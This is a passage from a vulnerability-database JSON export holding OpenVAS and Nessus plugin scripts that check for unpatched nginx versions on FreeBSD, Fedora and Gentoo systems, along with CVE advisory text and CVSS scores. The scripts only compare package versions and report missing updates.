Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n nginx\n nginx-devel\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://nginx.net/CHANGES\nhttp://lists.debian.org/debian-security-announce/2009/msg00205.html\nhttp://www.vuxml.org/freebsd/152b27f0-a158-11de-990c-e5b1d4c882e0.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(64894);\n script_version(\"$Revision: 4847 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-23 10:33:16 +0100 (Fri, 23 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-15 22:46:32 +0200 (Tue, 15 Sep 2009)\");\n script_cve_id(\"CVE-2009-2629\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: nginx\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"nginx\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.7.62\")<0) {\n txt += 'Package nginx version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"nginx-devel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.8.15\")<0) {\n txt += 'Package nginx-devel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-12T10:07:01", "description": " - Fri Dec 4 2009 Jeremy Hinegardner <jeremy at hinegardner\n dot org> - 0.7.64-1\n\n - update to 0.7.64\n\n - Thu Oct 29 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.63-1\n\n - update to 0.7.63\n\n - Mon Sep 14 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.62-1\n\n - update to 0.7.62\n\n - fixes CVE-2009-2629\n\n - Sun Aug 2 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.61-1\n\n - update to new stable 0.7.61\n\n - remove third-party module\n\n - Sat Apr 11 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> 0.6.36-1\n\n - update to 0.6.36\n\n - Wed Feb 25 2009 Fedora Release Engineering <rel-eng at\n lists.fedoraproject.org> - 0.6.35-3\n\n - Rebuilt for\n https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n\n - Thu Feb 19 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.35-2\n\n - rebuild\n\n - Thu Feb 19 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.35-1\n\n - update to 0.6.35\n\n - Sat Jan 17 2009 Tomas Mraz <tmraz at redhat.com> -\n 0.6.34-2\n\n - rebuild with new openssl\n\n - Tue Dec 30 2008 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.34-1\n\n - update to 0.6.34\n\n - Thu Dec 4 2008 Michael Schwendt <mschwendt at\n fedoraproject.org> - 0.6.33-2\n\n - Fix inclusion of /usr/share/nginx tree => no unowned\n directories.\n\n - Sun Nov 23 2008 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.33-1\n\n - update to 0.6.33\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-12-08T00:00:00", "title": "Fedora 10 : nginx-0.7.64-1.fc10 (2009-12775)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555", "CVE-2009-2629", "CVE-2009-3896"], "modified": "2009-12-08T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:nginx"], "id": "FEDORA_2009-12775.NASL", "href": "https://www.tenable.com/plugins/nessus/43033", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-12775.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43033);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2629\", \"CVE-2009-3555\", \"CVE-2009-3896\");\n script_bugtraq_id(36384, 36839, 36935);\n script_xref(name:\"FEDORA\", value:\"2009-12775\");\n\n script_name(english:\"Fedora 10 : nginx-0.7.64-1.fc10 (2009-12775)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fri Dec 4 2009 Jeremy Hinegardner <jeremy at hinegardner\n dot org> - 0.7.64-1\n\n - update to 0.7.64\n\n - Thu Oct 29 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.63-1\n\n - update to 0.7.63\n\n - Mon Sep 14 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.62-1\n\n - update to 0.7.62\n\n - fixes CVE-2009-2629\n\n - Sun Aug 2 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.61-1\n\n - update to new stable 0.7.61\n\n - remove third-party module\n\n - Sat Apr 11 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> 0.6.36-1\n\n - update to 0.6.36\n\n - Wed Feb 25 2009 Fedora Release Engineering <rel-eng at\n lists.fedoraproject.org> - 0.6.35-3\n\n - Rebuilt for\n https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n\n - Thu Feb 19 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.35-2\n\n - rebuild\n\n - Thu Feb 19 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.35-1\n\n - update to 0.6.35\n\n - Sat Jan 17 2009 Tomas Mraz <tmraz at redhat.com> -\n 0.6.34-2\n\n - rebuild with new openssl\n\n - Tue Dec 30 2008 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.34-1\n\n - update to 0.6.34\n\n - Thu Dec 4 2008 Michael Schwendt <mschwendt at\n fedoraproject.org> - 0.6.33-2\n\n - Fix inclusion of /usr/share/nginx tree => no unowned\n directories.\n\n - Sun Nov 23 2008 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.33-1\n\n - update to 0.6.33\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=539573\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/032251.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e3f8a5a6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nginx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nginx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"nginx-0.7.64-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nginx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:07:01", "description": " - Fri Dec 4 2009 Jeremy Hinegardner <jeremy at hinegardner\n dot org> - 0.7.64-1\n\n - Update to new stable 0.7.64\n\n - Thu Oct 29 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.63-1\n\n - Update to new stable 0.7.63\n\n - reinstate zlib dependency\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-12-08T00:00:00", "title": "Fedora 12 : nginx-0.7.64-1.fc12 (2009-12750)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555", "CVE-2009-2629", "CVE-2009-3896"], "modified": "2009-12-08T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:12", "p-cpe:/a:fedoraproject:fedora:nginx"], "id": "FEDORA_2009-12750.NASL", "href": "https://www.tenable.com/plugins/nessus/43032", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-12750.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43032);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2629\", \"CVE-2009-3555\", \"CVE-2009-3896\");\n script_bugtraq_id(36384, 36839, 36935);\n script_xref(name:\"FEDORA\", value:\"2009-12750\");\n\n script_name(english:\"Fedora 12 : nginx-0.7.64-1.fc12 (2009-12750)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fri Dec 4 2009 Jeremy Hinegardner <jeremy at hinegardner\n dot org> - 0.7.64-1\n\n - Update to new stable 0.7.64\n\n - Thu Oct 29 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.63-1\n\n - Update to new stable 0.7.63\n\n - reinstate zlib dependency\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=539573\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/032237.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?72850b86\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nginx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nginx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"nginx-0.7.64-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nginx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:07:01", "description": " - Fri Dec 4 2009 Jeremy Hinegardner <jeremy at hinegardner\n dot org> - 0.7.64-1\n\n - update to 0.7.64\n\n - Thu Oct 29 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.63-1\n\n - update to 0.7.63\n\n - Mon Sep 14 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.62-1\n\n - update to 0.7.62\n\n - fixes CVE-2009-2629\n\n - Sun Aug 2 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.61-1\n\n - update to new stable 0.7.61\n\n - remove third-party module\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-12-08T00:00:00", "title": "Fedora 11 : nginx-0.7.64-1.fc11 (2009-12782)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555", "CVE-2009-2629", "CVE-2009-3896"], "modified": "2009-12-08T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:11", "p-cpe:/a:fedoraproject:fedora:nginx"], "id": "FEDORA_2009-12782.NASL", "href": "https://www.tenable.com/plugins/nessus/43034", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-12782.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43034);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2629\", \"CVE-2009-3555\", \"CVE-2009-3896\");\n script_bugtraq_id(36384, 36839, 36935);\n script_xref(name:\"FEDORA\", value:\"2009-12782\");\n\n script_name(english:\"Fedora 11 : nginx-0.7.64-1.fc11 (2009-12782)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fri Dec 4 2009 Jeremy Hinegardner <jeremy at hinegardner\n dot org> - 0.7.64-1\n\n - update to 0.7.64\n\n - Thu Oct 29 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.63-1\n\n - update to 0.7.63\n\n - Mon Sep 14 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.62-1\n\n - update to 0.7.62\n\n - fixes CVE-2009-2629\n\n - Sun Aug 2 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.61-1\n\n - update to new stable 0.7.61\n\n - remove third-party module\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=539573\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/032258.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?72595697\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nginx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nginx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"nginx-0.7.64-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nginx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-08T17:43:02", "description": "The remote web server is running nginx, a lightweight, high\nperformance web server / reverse proxy and email (IMAP/POP3) proxy.\n\nAccording to its Server response header, the installed version of\nnginx is affected by multiple vulnerabilities : - A remote buffer\noverflow attack related to its parsing of complex URIs.\n\n - A remote denial of service attack related to its parsing\n of HTTP request headers.", "edition": 21, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2009-09-24T00:00:00", "title": "nginx HTTP Request Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2629", "CVE-2009-3896"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/a:nginx:nginx"], "id": "NGINX_HTTP_REQUEST_BUFFER_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/41608", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41608);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/07\");\n\n script_cve_id(\"CVE-2009-2629\", \"CVE-2009-3896\");\n script_bugtraq_id(36384, 36839);\n script_xref(name:\"CERT\", value:\"180065\");\n\n script_name(english:\"nginx HTTP Request Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The web server on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is running nginx, a lightweight, high\nperformance web server / reverse proxy and email (IMAP/POP3) proxy.\n\nAccording to its Server response header, the installed version of\nnginx is affected by multiple vulnerabilities : - A remote buffer\noverflow attack related to its parsing of complex URIs.\n\n - A remote denial of service attack related to its parsing\n of HTTP request headers.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://nginx.net/CHANGES\");\n script_set_attribute(attribute:\"see_also\", value:\"http://nginx.org/en/CHANGES-0.7\");\n script_set_attribute(attribute:\"see_also\", value:\"http://nginx.org/en/CHANGES-0.6\");\n script_set_attribute(attribute:\"see_also\", value:\"http://nginx.org/en/CHANGES-0.5\");\n script_set_attribute(attribute:\"see_also\", value:\"http://sysoev.ru/nginx/patch.180065.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2009/Oct/306\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 0.8.15, 0.7.62, 0.6.39, 0.5.38, or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2009-2629\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:nginx:nginx\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"nginx_detect.nasl\", \"nginx_nix_installed.nbin\");\n script_require_keys(\"installed_sw/nginx\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nappname = 'nginx';\nget_install_count(app_name:appname, exit_if_zero:TRUE);\napp_info = vcf::combined_get_app_info(app:appname);\n\nvcf::check_all_backporting(app_info:app_info);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n# If the detection is only remote, Detection Method won't be set, and we should require paranoia\nif (empty_or_null(app_info['Detection Method']) && report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nconstraints = [\n {'min_version':'0.1.0', 'fixed_version':'0.5.38'},\n {'min_version':'0.6.0', 'fixed_version':'0.6.39'},\n {'min_version':'0.7.0', 'fixed_version':'0.7.62'},\n {'min_version':'0.8.0', 'fixed_version':'0.8.15'}\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:53:33", "description": "The remote host is affected by the vulnerability described in GLSA-201203-22\n(nginx: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been found in nginx:\n The TLS protocol does not properly handle session renegotiation\n requests (CVE-2009-3555).\n The 'ngx_http_process_request_headers()' function in ngx_http_parse.c\n could cause a NULL pointer dereference (CVE-2009-3896).\n nginx does not properly sanitize user input for the the WebDAV COPY\n or MOVE methods (CVE-2009-3898).\n The 'ngx_resolver_copy()' function in ngx_resolver.c contains a\n boundary error which could cause a heap-based buffer overflow\n (CVE-2011-4315).\n nginx does not properly parse HTTP header responses which could\n expose sensitive information (CVE-2012-1180).\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the nginx process, cause a Denial of Service condition,\n create or overwrite arbitrary files, or obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 23, "published": "2012-06-21T00:00:00", "title": "GLSA-201203-22 : nginx: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3898", "CVE-2009-3555", "CVE-2011-4315", "CVE-2009-3896", "CVE-2012-1180"], "modified": "2012-06-21T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:nginx", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201203-22.NASL", "href": "https://www.tenable.com/plugins/nessus/59614", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201203-22.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See 